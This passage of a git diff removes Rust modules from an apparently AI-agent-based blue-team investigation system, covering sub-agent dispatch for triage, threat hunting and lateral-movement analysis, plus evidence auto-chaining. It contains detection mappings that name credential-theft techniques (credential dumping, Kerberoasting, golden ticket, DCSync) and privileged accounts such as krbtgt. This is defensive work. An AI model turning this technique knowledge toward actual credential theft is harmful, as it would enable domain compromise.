queue.connection(); - - // Store env vars for the investigation (blue tools read these from Redis) - let env_vars = collect_blue_env_vars(); - if !env_vars.is_empty() { - let env_key = format!("ares:blue:inv:{inv_id}:env_vars"); - let env_json = serde_json::to_string(&env_vars)?; - let _: () = conn.set(&env_key, &env_json).await?; - let _: () = conn.expire(&env_key, 3600).await?; - } - - // Push to investigation queue - let request_json = serde_json::to_string(&request)?; - let _: () = conn - .rpush("ares:blue:investigations", &request_json) - .await?; - - // Track investigation against operation - let op_inv_key = format!("ares:blue:op:{op_id}:investigations"); - let _: () = conn.sadd(&op_inv_key, &inv_id).await?; - let _: () = conn.expire(&op_inv_key, 7 * 24 * 3600).await?; - - Ok(inv_id) -} diff --git a/ares-orchestrator/src/blue/callbacks.rs b/ares-orchestrator/src/blue/callbacks.rs deleted file mode 100644 index 5020ae3a..00000000 --- a/ares-orchestrator/src/blue/callbacks.rs +++ /dev/null @@ -1,621 +0,0 @@ -//! 
Blue team callback handler for orchestrator dispatch and query tools. -//! -//! Implements `CallbackHandler` to handle: -//! - **Dispatch tools** — `dispatch_triage`, `dispatch_threat_hunt`, -//! `dispatch_lateral_analysis` run sub-agent loops inline and return results. -//! - **Query tools** — `get_investigation_status`, `get_task_result`, -//! `wait_for_all_tasks` read from Redis investigation state. -//! - **Completion callbacks** — `complete_investigation`, `escalate_investigation`, -//! `triage_complete`, etc. signal investigation lifecycle transitions. - -use std::sync::Arc; - -use anyhow::Result; -use tracing::{info, warn}; - -use ares_llm::agent_loop::CallbackResult; -use ares_llm::tool_registry::blue::{self, BlueAgentRole}; -use ares_llm::{ - run_agent_loop, AgentLoopConfig, CallbackHandler, LlmProvider, TokenUsage, ToolCall, - ToolDispatcher, -}; - -use super::sub_agent::{BlueToolDispatcher, SubAgentCallbackHandler}; - -/// All tool names this handler recognizes as callbacks. -pub(super) const BLUE_HANDLED_TOOLS: &[&str] = &[ - // Dispatch tools (run sub-agent loops) - "dispatch_triage", - "dispatch_threat_hunt", - "dispatch_lateral_analysis", - // Query tools - "get_investigation_status", - "get_task_result", - "wait_for_all_tasks", - // Completion/lifecycle callbacks - "triage_complete", - "hunt_complete", - "lateral_complete", - "complete_investigation", - "escalate_investigation", - "confirm_escalation", - "downgrade_escalation", - "request_reinvestigation", - "route_to_team", -]; - -/// Blue team callback handler for the orchestrator agent. -/// -/// Created per-investigation, holds references needed to run sub-agent loops -/// and query investigation state. -pub struct BlueCallbackHandler { - provider: Arc, - dispatcher: Arc, - model: String, - investigation_id: String, - alert: serde_json::Value, - redis_url: String, -} - -impl BlueCallbackHandler { - pub fn new( - provider: Arc, - dispatcher: Arc, - model: String, - investigation_id: String, - alert: serde_json::Value, - redis_url: String, - ) -> Self { - Self { - provider, - dispatcher, - model, - investigation_id, - alert, - redis_url, - } - } - - /// Run a sub-agent loop for a blue team role and return the result text. - async fn run_sub_agent(&self, role: BlueAgentRole, task_prompt: &str) -> Result { - let tools = blue::blue_tools_for_role(role); - let capabilities: Vec = tools - .iter() - .filter(|t| !blue::is_blue_callback_tool(&t.name)) - .map(|t| t.name.clone()) - .collect(); - - let system_prompt = - ares_llm::prompt::blue::build_blue_system_prompt(role.as_str(), &capabilities)?; - - let config = AgentLoopConfig { - model: self.model.clone(), - max_steps: 50, - max_tool_calls_per_name: 25, - ..AgentLoopConfig::default() - }; - - // Wrap the dispatcher so blue tools (add_evidence, add_technique, etc.) - // are executed locally via dispatch_blue() instead of going through - // the red-team dispatcher which doesn't know about them. 
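// The wrapper described above, reduced to a self-contained sketch: an outer
// dispatcher executes blue-only tools locally and forwards everything else
// to the wrapped one. The `Dispatch` trait here is an illustrative stand-in,
// not the actual ares_llm `ToolDispatcher` API.
trait Dispatch {
    fn dispatch(&self, tool: &str, args: &str) -> String;
}

struct RedDispatcher;

impl Dispatch for RedDispatcher {
    fn dispatch(&self, tool: &str, _args: &str) -> String {
        format!("red dispatcher handled {tool}")
    }
}

struct BlueWrapper<D: Dispatch> {
    inner: D,
}

impl<D: Dispatch> Dispatch for BlueWrapper<D> {
    fn dispatch(&self, tool: &str, args: &str) -> String {
        match tool {
            // blue-only tools never reach the red-team dispatcher
            "add_evidence" | "add_technique" => format!("handled locally: {tool}"),
            // everything else falls through to the wrapped dispatcher
            _ => self.inner.dispatch(tool, args),
        }
    }
}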
- let blue_dispatcher: Arc = Arc::new(BlueToolDispatcher { - inner: Arc::clone(&self.dispatcher), - }); - - let sub_agent_cb: Arc = Arc::new(SubAgentCallbackHandler { - investigation_id: self.investigation_id.clone(), - redis_url: self.redis_url.clone(), - }); - - let outcome = run_agent_loop( - self.provider.as_ref(), - blue_dispatcher, - &config, - &system_prompt, - task_prompt, - role.as_str(), - &self.investigation_id, - &tools, - Some(sub_agent_cb), - ) - .await; - - // Extract result text from the outcome - let result = match &outcome.reason { - ares_llm::LoopEndReason::TaskComplete { result, .. } => result.clone(), - ares_llm::LoopEndReason::EndTurn { content } => content.clone(), - ares_llm::LoopEndReason::RequestAssistance { issue, context } => { - format!("Sub-agent requested assistance: {issue}. Context: {context}") - } - ares_llm::LoopEndReason::MaxSteps => { - format!("Sub-agent hit max steps ({} steps)", outcome.steps) - } - ares_llm::LoopEndReason::MaxTokens => "Sub-agent hit max tokens".to_string(), - ares_llm::LoopEndReason::Error(e) => format!("Sub-agent error: {e}"), - }; - - Ok(result) - } - - /// Dispatch triage sub-agent. - async fn dispatch_triage(&self, _call: &ToolCall) -> Result { - info!( - investigation_id = %self.investigation_id, - "Dispatching triage sub-agent" - ); - - let alert_summary = serde_json::to_string_pretty(&self.alert).unwrap_or_default(); - let task_prompt = format!( - "You are triaging alert for investigation {}.\n\n\ - Alert data:\n{}\n\n\ - Analyze this alert. Determine severity, identify key indicators of compromise, \ - and recommend whether this needs deeper investigation. Use the available Loki \ - query tools to examine relevant logs around the alert timeframe.", - self.investigation_id, alert_summary - ); - - let result = self - .run_sub_agent(BlueAgentRole::Triage, &task_prompt) - .await?; - info!( - investigation_id = %self.investigation_id, - "Triage sub-agent completed" - ); - Ok(CallbackResult::Continue(format!( - "Triage result:\n{result}" - ))) - } - - /// Dispatch threat hunt sub-agent. - async fn dispatch_threat_hunt(&self, call: &ToolCall) -> Result { - let technique_id = call.arguments["technique_id"].as_str().unwrap_or("unknown"); - let detection_method = call.arguments["detection_method"] - .as_str() - .unwrap_or("log_analysis"); - let hostname = call.arguments["hostname"].as_str().unwrap_or(""); - let username = call.arguments["username"].as_str().unwrap_or(""); - let context = call.arguments["context"].as_str().unwrap_or(""); - - info!( - investigation_id = %self.investigation_id, - technique_id = technique_id, - "Dispatching threat hunt sub-agent" - ); - - let mut task_prompt = format!( - "You are hunting for MITRE ATT&CK technique {} in investigation {}.\n\ - Detection method: {}\n", - technique_id, self.investigation_id, detection_method - ); - if !hostname.is_empty() { - task_prompt.push_str(&format!("Target host: {hostname}\n")); - } - if !username.is_empty() { - task_prompt.push_str(&format!("Target user: {username}\n")); - } - if !context.is_empty() { - task_prompt.push_str(&format!("Context: {context}\n")); - } - task_prompt.push_str( - "\nUse the available Loki query tools to search for evidence of this technique. 
\
-             Look for relevant log patterns, authentication events, process execution, \
-             and lateral movement indicators.",
-        );
-
-        let result = self
-            .run_sub_agent(BlueAgentRole::ThreatHunter, &task_prompt)
-            .await?;
-        info!(
-            investigation_id = %self.investigation_id,
-            technique_id = technique_id,
-            "Threat hunt sub-agent completed"
-        );
-        Ok(CallbackResult::Continue(format!(
-            "Threat hunt result ({technique_id}):\n{result}"
-        )))
-    }
-
-    /// Dispatch lateral analysis sub-agent.
-    async fn dispatch_lateral_analysis(&self, call: &ToolCall) -> Result<CallbackResult> {
-        let focus_host = call.arguments["focus_host"].as_str().unwrap_or("unknown");
-        let focus_user = call.arguments["focus_user"].as_str().unwrap_or("");
-        let context = call.arguments["context"].as_str().unwrap_or("");
-
-        info!(
-            investigation_id = %self.investigation_id,
-            focus_host = focus_host,
-            "Dispatching lateral analysis sub-agent"
-        );
-
-        let mut task_prompt = format!(
-            "You are analyzing lateral movement patterns in investigation {}.\n\
-             Primary host: {}\n",
-            self.investigation_id, focus_host
-        );
-        if !focus_user.is_empty() {
-            task_prompt.push_str(&format!("Primary user: {focus_user}\n"));
-        }
-        if !context.is_empty() {
-            task_prompt.push_str(&format!("Context: {context}\n"));
-        }
-        task_prompt.push_str(
-            "\nUse the available Loki query tools to trace authentication patterns, \
-             SMB/WinRM/RDP connections, and credential usage across hosts. Map the \
-             lateral movement path and identify compromised accounts.",
-        );
-
-        let result = self
-            .run_sub_agent(BlueAgentRole::LateralAnalyst, &task_prompt)
-            .await?;
-        info!(
-            investigation_id = %self.investigation_id,
-            focus_host = focus_host,
-            "Lateral analysis sub-agent completed"
-        );
-        Ok(CallbackResult::Continue(format!(
-            "Lateral analysis result:\n{result}"
-        )))
-    }
-
-    /// Dispatch escalation triage sub-agent.
-    ///
-    /// Instead of immediately returning `RequestAssistance`, we launch an
-    /// `EscalationTriage` sub-agent that reviews the investigation context and
-    /// decides whether to confirm, downgrade, reinvestigate, or route.
-    async fn dispatch_escalation_triage(&self, call: &ToolCall) -> Result<CallbackResult> {
-        let reason = call.arguments["reason"].as_str().unwrap_or("unknown");
-        let severity = call.arguments["severity"].as_str().unwrap_or("high");
-
-        info!(
-            investigation_id = %self.investigation_id,
-            severity = severity,
-            reason = reason,
-            "Dispatching escalation triage sub-agent"
-        );
-
-        let task_prompt = format!(
-            "You are performing escalation triage for investigation {}.\n\n\
-             Escalation reason: {}\n\
-             Severity: {}\n\n\
-             Review the full investigation context using get_investigation_context. \
-             Then make ONE of these decisions:\n\
-             1. confirm_escalation — if the evidence warrants human review\n\
-             2. downgrade_escalation — if this is a false positive or low severity\n\
-             3. request_reinvestigation — if more evidence is needed before deciding\n\
-             4. route_to_team — if a specialist team should handle this\n\n\
-             Be decisive. Evaluate the evidence quality, technique severity, and \
-             scope of compromise before making your decision.",
-            self.investigation_id, reason, severity
-        );
-
-        let result = self
-            .run_sub_agent(BlueAgentRole::EscalationTriage, &task_prompt)
-            .await?;
-
-        info!(
-            investigation_id = %self.investigation_id,
-            "Escalation triage sub-agent completed"
-        );
-
-        // If the triage confirmed escalation, propagate as RequestAssistance
-        // so the orchestrator loop terminates with escalated status.
-        // Otherwise return the triage decision as a Continue so the orchestrator
-        // can incorporate the finding (e.g., downgrade → complete investigation).
-        let lower = result.to_lowercase();
-        if lower.contains("escalation confirmed") || lower.contains("confirm") {
-            Ok(CallbackResult::RequestAssistance {
-                issue: format!("Escalation confirmed by triage ({severity}): {reason}"),
-                context: result,
-            })
-        } else {
-            Ok(CallbackResult::Continue(format!(
-                "Escalation triage result:\n{result}"
-            )))
-        }
-    }
-
-    /// Handle query tools that read investigation state from Redis.
-    async fn handle_query_tool(&self, call: &ToolCall) -> Result<CallbackResult> {
-        match call.name.as_str() {
-            "get_investigation_status" => {
-                let reader = ares_core::state::BlueStateReader::new(self.investigation_id.clone());
-                let mut conn = redis::Client::open(self.redis_url.as_str())?
-                    .get_connection_manager()
-                    .await?;
-                match reader.load_state(&mut conn).await? {
-                    Some(state) => {
-                        let mut summary = format!(
-                            "Investigation: {}\nStage: {:?}\n",
-                            self.investigation_id, state.stage
-                        );
-                        if !state.evidence.is_empty() {
-                            summary
-                                .push_str(&format!("Evidence items: {}\n", state.evidence.len()));
-                            for (i, ev) in state.evidence.iter().enumerate().take(10) {
-                                summary.push_str(&format!(
-                                    "  {}. [{}] {}\n",
-                                    i + 1,
-                                    ev.evidence_type,
-                                    ev.value
-                                ));
-                            }
-                        }
-                        if !state.timeline.is_empty() {
-                            summary
-                                .push_str(&format!("Timeline events: {}\n", state.timeline.len()));
-                        }
-                        Ok(CallbackResult::Continue(summary))
-                    }
-                    None => Ok(CallbackResult::Continue(
-                        "Investigation state not yet initialized.".to_string(),
-                    )),
-                }
-            }
-            "get_task_result" => {
-                let task_id = call.arguments["task_id"].as_str().unwrap_or("unknown");
-                Ok(CallbackResult::Continue(format!(
-                    "Task {task_id} result lookup not yet implemented — \
-                     sub-agent results are returned inline from dispatch tools."
-                )))
-            }
-            "wait_for_all_tasks" => {
-                // In the inline dispatch model, tasks complete synchronously
-                Ok(CallbackResult::Continue(
-                    "All dispatched tasks have completed (inline execution).".to_string(),
-                ))
-            }
-            _ => Ok(CallbackResult::Continue(format!(
-                "Unknown query tool: {}",
-                call.name
-            ))),
-        }
-    }
-
-    /// Handle completion/lifecycle callbacks.
-    pub(super) fn handle_lifecycle_callback(call: &ToolCall) -> Option<CallbackResult> {
-        match call.name.as_str() {
-            "triage_complete" => {
-                let severity = call.arguments["severity"].as_str().unwrap_or("unknown");
-                let summary = call.arguments["summary"].as_str().unwrap_or("");
-                let escalate = call.arguments["escalate"].as_bool().unwrap_or(false);
-                let result =
-                    format!("Triage complete: severity={severity}, escalate={escalate}. {summary}");
-                Some(CallbackResult::TaskComplete {
-                    task_id: "triage".into(),
-                    result,
-                })
-            }
-            "hunt_complete" => {
-                let findings = call.arguments["findings"].as_str().unwrap_or("");
-                let confidence = call.arguments["confidence"].as_str().unwrap_or("medium");
-                let result = format!("Hunt complete (confidence: {confidence}): {findings}");
-                Some(CallbackResult::TaskComplete {
-                    task_id: "threat_hunt".into(),
-                    result,
-                })
-            }
-            "lateral_complete" => {
-                let connections = call.arguments["connections_found"].as_u64().unwrap_or(0);
-                let summary = call.arguments["summary"].as_str().unwrap_or("");
-                let result =
-                    format!("Lateral analysis: {connections} connections found.
{summary}"); - Some(CallbackResult::TaskComplete { - task_id: "lateral_analysis".into(), - result, - }) - } - "complete_investigation" => { - let summary = call.arguments["summary"].as_str().unwrap_or(""); - let result = format!("Investigation complete. {summary}"); - Some(CallbackResult::TaskComplete { - task_id: "investigation".into(), - result: result.to_string(), - }) - } - // escalate_investigation is handled async in dispatch_escalation_triage - "confirm_escalation" => { - let action = call.arguments["action"].as_str().unwrap_or("escalate"); - Some(CallbackResult::TaskComplete { - task_id: "escalation_triage".into(), - result: format!("Escalation confirmed: {action}"), - }) - } - "downgrade_escalation" => { - let reason = call.arguments["reason"].as_str().unwrap_or(""); - Some(CallbackResult::TaskComplete { - task_id: "escalation_triage".into(), - result: format!("Escalation downgraded: {reason}"), - }) - } - "request_reinvestigation" => { - let focus = call.arguments["focus"].as_str().unwrap_or(""); - Some(CallbackResult::Continue(format!( - "Reinvestigation queued with focus: {focus}" - ))) - } - "route_to_team" => { - let team = call.arguments["team"].as_str().unwrap_or("soc"); - let priority = call.arguments["priority"].as_str().unwrap_or("medium"); - Some(CallbackResult::TaskComplete { - task_id: "routing".into(), - result: format!("Routed to {team} team (priority: {priority})"), - }) - } - _ => None, - } - } -} - -#[async_trait::async_trait] -impl CallbackHandler for BlueCallbackHandler { - fn is_callback(&self, tool_name: &str) -> bool { - BLUE_HANDLED_TOOLS.contains(&tool_name) - } - - async fn handle_callback(&self, call: &ToolCall) -> Option> { - match call.name.as_str() { - // Dispatch tools — run sub-agent loops - "dispatch_triage" => Some(self.dispatch_triage(call).await), - "dispatch_threat_hunt" => Some(self.dispatch_threat_hunt(call).await), - "dispatch_lateral_analysis" => Some(self.dispatch_lateral_analysis(call).await), - - // Escalation — launches escalation triage sub-agent - "escalate_investigation" => Some(self.dispatch_escalation_triage(call).await), - - // Query tools - "get_investigation_status" | "get_task_result" | "wait_for_all_tasks" => { - Some(self.handle_query_tool(call).await) - } - - // Lifecycle callbacks - _ => Self::handle_lifecycle_callback(call).map(Ok), - } - } - - async fn on_token_usage(&self, usage: &TokenUsage, model: &str) { - if usage.input_tokens == 0 && usage.output_tokens == 0 { - return; - } - if let Ok(client) = redis::Client::open(self.redis_url.as_str()) { - if let Ok(mut conn) = client.get_connection_manager().await { - if let Err(e) = ares_core::token_usage::increment_blue_token_usage( - &mut conn, - &self.investigation_id, - usage.input_tokens.into(), - usage.output_tokens.into(), - model, - ) - .await - { - warn!(err = %e, "Failed to record blue token usage"); - } - } - } - } -} - -#[cfg(test)] -mod tests { - use super::*; - use serde_json::json; - - #[test] - fn test_is_callback() { - let handler = BlueCallbackHandler { - provider: Arc::new(MockProvider), - dispatcher: Arc::new(MockDispatcher), - model: "test".into(), - investigation_id: "inv-test".into(), - alert: json!({}), - redis_url: "redis://localhost".into(), - }; - - assert!(handler.is_callback("dispatch_triage")); - assert!(handler.is_callback("dispatch_threat_hunt")); - assert!(handler.is_callback("dispatch_lateral_analysis")); - assert!(handler.is_callback("complete_investigation")); - assert!(handler.is_callback("escalate_investigation")); - 
assert!(handler.is_callback("get_investigation_status")); - assert!(!handler.is_callback("nmap_scan")); - assert!(!handler.is_callback("query_loki_logs")); - } - - #[test] - fn test_triage_complete_callback() { - let call = ToolCall { - id: "c1".into(), - name: "triage_complete".into(), - arguments: json!({ - "severity": "high", - "summary": "Kerberoasting detected", - "escalate": true, - }), - }; - let result = BlueCallbackHandler::handle_lifecycle_callback(&call).unwrap(); - match result { - CallbackResult::TaskComplete { result, .. } => { - assert!(result.contains("high")); - assert!(result.contains("escalate=true")); - } - _ => panic!("Expected TaskComplete"), - } - } - - #[test] - fn test_escalate_investigation_not_in_lifecycle_callbacks() { - // escalate_investigation is now handled async via dispatch_escalation_triage, - // not the static handle_lifecycle_callback - let call = ToolCall { - id: "c2".into(), - name: "escalate_investigation".into(), - arguments: json!({ - "reason": "Active lateral movement detected", - "severity": "critical", - }), - }; - assert!(BlueCallbackHandler::handle_lifecycle_callback(&call).is_none()); - } - - #[test] - fn test_complete_investigation_callback() { - let call = ToolCall { - id: "c3".into(), - name: "complete_investigation".into(), - arguments: json!({ - "summary": "True positive: credential theft confirmed", - }), - }; - let result = BlueCallbackHandler::handle_lifecycle_callback(&call).unwrap(); - match result { - CallbackResult::TaskComplete { result, .. } => { - assert!(result.contains("credential theft")); - } - _ => panic!("Expected TaskComplete"), - } - } - - #[test] - fn test_unknown_callback() { - let call = ToolCall { - id: "c4".into(), - name: "nmap_scan".into(), - arguments: json!({}), - }; - assert!(BlueCallbackHandler::handle_lifecycle_callback(&call).is_none()); - } - - // Minimal mock types for tests - struct MockProvider; - - #[async_trait::async_trait] - impl LlmProvider for MockProvider { - async fn chat( - &self, - _request: &ares_llm::provider::LlmRequest, - ) -> std::result::Result - { - unimplemented!("Mock provider") - } - fn name(&self) -> &str { - "mock" - } - } - - struct MockDispatcher; - - #[async_trait::async_trait] - impl ToolDispatcher for MockDispatcher { - async fn dispatch_tool( - &self, - _role: &str, - _task_id: &str, - _call: &ToolCall, - ) -> anyhow::Result { - Ok(ares_llm::ToolExecResult { - output: "mock result".to_string(), - error: None, - discoveries: None, - }) - } - } -} diff --git a/ares-orchestrator/src/blue/chaining.rs b/ares-orchestrator/src/blue/chaining.rs deleted file mode 100644 index 98138642..00000000 --- a/ares-orchestrator/src/blue/chaining.rs +++ /dev/null @@ -1,598 +0,0 @@ -//! Evidence auto-chaining for blue team investigations. -//! -//! When a task result contains evidence of certain types, this module -//! automatically spawns follow-up investigation tasks. This mirrors -//! the Python `EVIDENCE_CHAIN_MAP` / `_process_result_chains` logic -//! in `result_processing.py`. - -use std::collections::{HashMap, HashSet}; -use std::sync::LazyLock; - -use anyhow::Result; -use chrono::Utc; -use serde_json::Value; -use tracing::{debug, info}; - -use ares_core::state::blue_task_queue::{BlueTaskMessage, BlueTaskQueue, BlueTaskResult}; -use ares_llm::tool_registry::blue::BlueAgentRole; - -// ── Static configuration ─────────────────────────────────────────── - -/// Follow-up action descriptor produced by evidence chaining. 
-#[derive(Debug, Clone)]
-struct ChainAction {
-    /// Task type to dispatch (e.g. `"threat_hunt"`, `"lateral_analysis"`).
-    task_type: &'static str,
-    /// Worker role that handles this task type.
-    role: BlueAgentRole,
-    /// Human-readable description embedded in the task params.
-    focus: &'static str,
-}
-
-/// Evidence type to follow-up actions mapping.
-///
-/// When a task result contains an evidence type key, the corresponding
-/// actions are dispatched as follow-up sub-tasks (subject to dedup).
-static EVIDENCE_CHAIN_MAP: LazyLock<HashMap<&'static str, Vec<ChainAction>>> =
-    LazyLock::new(|| {
-        let mut m = HashMap::new();
-
-        m.insert(
-            "suspicious_ip",
-            vec![ChainAction {
-                task_type: "threat_hunt",
-                role: BlueAgentRole::ThreatHunter,
-                focus: "IP correlation analysis",
-            }],
-        );
-
-        m.insert(
-            "malicious_process",
-            vec![ChainAction {
-                task_type: "threat_hunt",
-                role: BlueAgentRole::ThreatHunter,
-                focus: "process ancestry and execution chain analysis",
-            }],
-        );
-
-        m.insert(
-            "lateral_movement",
-            vec![ChainAction {
-                task_type: "lateral_analysis",
-                role: BlueAgentRole::LateralAnalyst,
-                focus: "lateral movement path reconstruction",
-            }],
-        );
-
-        m.insert(
-            "credential_access",
-            vec![ChainAction {
-                task_type: "threat_hunt",
-                role: BlueAgentRole::ThreatHunter,
-                focus: "credential abuse pattern detection",
-            }],
-        );
-
-        m.insert(
-            "persistence_mechanism",
-            vec![ChainAction {
-                task_type: "threat_hunt",
-                role: BlueAgentRole::ThreatHunter,
-                focus: "persistence indicator sweep",
-            }],
-        );
-
-        m.insert(
-            "c2_communication",
-            vec![ChainAction {
-                task_type: "threat_hunt",
-                role: BlueAgentRole::ThreatHunter,
-                focus: "network IOC and C2 beacon analysis",
-            }],
-        );
-
-        m.insert(
-            "privilege_escalation",
-            vec![
-                ChainAction {
-                    task_type: "lateral_analysis",
-                    role: BlueAgentRole::LateralAnalyst,
-                    focus: "post-escalation lateral movement assessment",
-                },
-                ChainAction {
-                    task_type: "threat_hunt",
-                    role: BlueAgentRole::ThreatHunter,
-                    focus: "privilege escalation technique detection",
-                },
-            ],
-        );
-
-        m
-    });
-
-/// Users whose appearance in results triggers automatic escalation.
-static CRITICAL_USERS: LazyLock<HashSet<&'static str>> = LazyLock::new(|| {
-    let mut s = HashSet::new();
-    s.insert("krbtgt");
-    s.insert("administrator");
-    s.insert("domain admins");
-    s.insert("enterprise admins");
-    s.insert("schema admins");
-    s
-});
-
-// ── Public API ──────────────────────────────────────────────────────
-
-/// Process a completed task result and dispatch any follow-up tasks
-/// dictated by the evidence chain map.
-///
-/// Returns the list of newly dispatched task IDs (may be empty).
-///
-/// `dispatched_chains` is the per-investigation dedup set: each entry
-/// is `"{evidence_type}:{task_type}"`. The caller must persist this
-/// set across calls for the same investigation.
-pub async fn process_task_result(
-    result: &BlueTaskResult,
-    task_queue: &mut BlueTaskQueue,
-    investigation_id: &str,
-    dispatched_chains: &mut HashSet<String>,
-) -> Result<Vec<String>> {
-    let payload = match (&result.success, &result.result) {
-        (true, Some(val)) => val,
-        _ => return Ok(Vec::new()),
-    };
-
-    let mut new_task_ids = Vec::new();
-
-    // 1. Extract evidence types from the result payload.
-    let evidence_types = extract_evidence_types(payload);
-
-    for ev_type in &evidence_types {
-        if let Some(actions) = EVIDENCE_CHAIN_MAP.get(ev_type.as_str()) {
-            for action in actions {
-                let dedup_key = format!("{ev_type}:{}", action.task_type);
-                if dispatched_chains.contains(&dedup_key) {
-                    debug!(
-                        investigation_id,
-                        evidence_type = ev_type.as_str(),
-                        task_type = action.task_type,
-                        "Skipping duplicate chain dispatch"
-                    );
-                    continue;
-                }
-
-                let task_id =
-                    dispatch_chain_task(task_queue, investigation_id, action, ev_type).await?;
-
-                dispatched_chains.insert(dedup_key);
-                new_task_ids.push(task_id);
-            }
-        }
-    }
-
-    // 2. Check for critical user escalation.
-    if let Some(reason) = should_escalate(result) {
-        let escalation_dedup = "escalation:critical_user".to_string();
-        if !dispatched_chains.contains(&escalation_dedup) {
-            info!(
-                investigation_id,
-                reason = reason.as_str(),
-                "Auto-escalating: critical user detected"
-            );
-
-            // Dispatch both golden ticket detection and DCSync detection.
-            for (task_type, focus) in [
-                (
-                    "threat_hunt",
-                    "golden ticket detection for critical user activity",
-                ),
-                ("threat_hunt", "DCSync detection for critical user activity"),
-            ] {
-                let sub_dedup = format!("escalation:{task_type}:{focus}");
-                if dispatched_chains.contains(&sub_dedup) {
-                    continue;
-                }
-
-                let action = ChainAction {
-                    task_type,
-                    role: BlueAgentRole::ThreatHunter,
-                    focus,
-                };
-                let task_id =
-                    dispatch_chain_task(task_queue, investigation_id, &action, "critical_user")
-                        .await?;
-                dispatched_chains.insert(sub_dedup);
-                new_task_ids.push(task_id);
-            }
-
-            dispatched_chains.insert(escalation_dedup);
-        }
-    }
-
-    if !new_task_ids.is_empty() {
-        info!(
-            investigation_id,
-            count = new_task_ids.len(),
-            task_ids = ?new_task_ids,
-            "Auto-chained follow-up tasks"
-        );
-    }
-
-    Ok(new_task_ids)
-}
-
-/// Check whether a task result warrants automatic escalation.
-///
-/// Returns `Some(reason)` if escalation is warranted, `None` otherwise.
-pub fn should_escalate(result: &BlueTaskResult) -> Option<String> {
-    let payload = result.result.as_ref()?;
-
-    // Check users_investigated array for critical user names.
-    if let Some(users) = payload.get("users_investigated").and_then(|v| v.as_array()) {
-        for user in users {
-            if let Some(name) = user.as_str() {
-                let lower = name.to_lowercase();
-                let trimmed = lower.trim();
-                if CRITICAL_USERS.contains(trimmed) {
-                    return Some(format!("Critical user detected: {name}"));
-                }
-            }
-        }
-    }
-
-    // Check evidence_highlights for critical user mentions.
-    if let Some(highlights) = payload
-        .get("evidence_highlights")
-        .and_then(|v| v.as_array())
-    {
-        for highlight in highlights {
-            if let Some(text) = highlight.as_str() {
-                let lower = text.to_lowercase();
-                for &critical in CRITICAL_USERS.iter() {
-                    if lower.contains(critical) {
-                        return Some(format!("Critical user '{critical}' mentioned in evidence"));
-                    }
-                }
-            }
-        }
-    }
-
-    // Check for high-severity indicators in the result.
-    if let Some(severity) = payload.get("severity").and_then(|v| v.as_str()) {
-        let sev_lower = severity.to_lowercase();
-        if sev_lower == "critical" || sev_lower == "high" {
-            return Some(format!("High severity result: {severity}"));
-        }
-    }
-
-    // Check findings text for critical user mentions.
- if let Some(findings) = payload.get("findings").and_then(|v| v.as_str()) { - let lower = findings.to_lowercase(); - for &critical in CRITICAL_USERS.iter() { - if lower.contains(critical) { - return Some(format!("Critical user '{critical}' mentioned in findings")); - } - } - } - - None -} - -// ── Internals ────────────────────────────────────────────────────── - -/// Extract evidence type strings from a result payload. -/// -/// Looks for: -/// - `evidence_types`: `["suspicious_ip", ...]` -/// - `evidence`: `[{ "type": "suspicious_ip", ... }, ...]` -/// - `techniques_found`: maps MITRE technique IDs to evidence types -fn extract_evidence_types(payload: &Value) -> Vec { - let mut types = Vec::new(); - - // Direct evidence_types array - if let Some(arr) = payload.get("evidence_types").and_then(|v| v.as_array()) { - for item in arr { - if let Some(s) = item.as_str() { - types.push(s.to_lowercase()); - } - } - } - - // Evidence objects with a "type" field - if let Some(arr) = payload.get("evidence").and_then(|v| v.as_array()) { - for item in arr { - if let Some(ev_type) = item.get("type").and_then(|v| v.as_str()) { - types.push(ev_type.to_lowercase()); - } - } - } - - // MITRE technique mapping (mirrors Python _process_result_chains) - if let Some(arr) = payload.get("techniques_found").and_then(|v| v.as_array()) { - for tech in arr { - if let Some(tech_str) = tech.as_str() { - let lower = tech_str.to_lowercase(); - if lower.contains("t1558") { - // Kerberoasting -> credential_access - types.push("credential_access".to_string()); - } else if lower.contains("t1003") { - // OS Credential Dumping -> credential_access - types.push("credential_access".to_string()); - } else if lower.contains("t1550") { - // Use Alternate Authentication Material -> lateral_movement - types.push("lateral_movement".to_string()); - } else if lower.contains("t1021") { - // Remote Services -> lateral_movement - types.push("lateral_movement".to_string()); - } else if lower.contains("t1053") || lower.contains("t1547") { - // Scheduled Task / Boot Autostart -> persistence_mechanism - types.push("persistence_mechanism".to_string()); - } else if lower.contains("t1071") || lower.contains("t1105") { - // Application Layer Protocol / Ingress Tool Transfer -> c2 - types.push("c2_communication".to_string()); - } else if lower.contains("t1068") || lower.contains("t1134") { - // Exploitation for Privilege Escalation / Access Token Manipulation - types.push("privilege_escalation".to_string()); - } - } - } - } - - // Dedup while preserving order - let mut seen = HashSet::new(); - types.retain(|t| seen.insert(t.clone())); - - types -} - -/// Dispatch a single chained follow-up task to the blue task queue. 
-async fn dispatch_chain_task(
-    task_queue: &mut BlueTaskQueue,
-    investigation_id: &str,
-    action: &ChainAction,
-    evidence_type: &str,
-) -> Result<String> {
-    let task_id = format!(
-        "chain_{}_{}_{}_{}",
-        action.task_type,
-        evidence_type,
-        &investigation_id.chars().take(8).collect::<String>(),
-        &uuid::Uuid::new_v4().simple().to_string()[..8]
-    );
-
-    let params = serde_json::json!({
-        "chained_from_evidence": evidence_type,
-        "focus": action.focus,
-        "auto_chained": true,
-    });
-
-    let task = BlueTaskMessage {
-        task_id: task_id.clone(),
-        investigation_id: investigation_id.to_string(),
-        task_type: action.task_type.to_string(),
-        role: action.role.as_str().to_string(),
-        params,
-        created_at: Utc::now().to_rfc3339(),
-    };
-
-    task_queue.submit_task(&task).await?;
-
-    info!(
-        task_id = %task_id,
-        task_type = action.task_type,
-        evidence_type,
-        focus = action.focus,
-        investigation_id,
-        "Dispatched chained follow-up task"
-    );
-
-    Ok(task_id)
-}
-
-#[cfg(test)]
-mod tests {
-    use super::*;
-    use serde_json::json;
-
-    #[test]
-    fn test_extract_evidence_types_from_evidence_types_array() {
-        let payload = json!({
-            "evidence_types": ["suspicious_ip", "lateral_movement"]
-        });
-        let types = extract_evidence_types(&payload);
-        assert_eq!(types, vec!["suspicious_ip", "lateral_movement"]);
-    }
-
-    #[test]
-    fn test_extract_evidence_types_from_evidence_objects() {
-        let payload = json!({
-            "evidence": [
-                { "type": "Credential_Access", "value": "hash123" },
-                { "type": "c2_communication", "value": "beacon" }
-            ]
-        });
-        let types = extract_evidence_types(&payload);
-        assert_eq!(types, vec!["credential_access", "c2_communication"]);
-    }
-
-    #[test]
-    fn test_extract_evidence_types_from_techniques() {
-        let payload = json!({
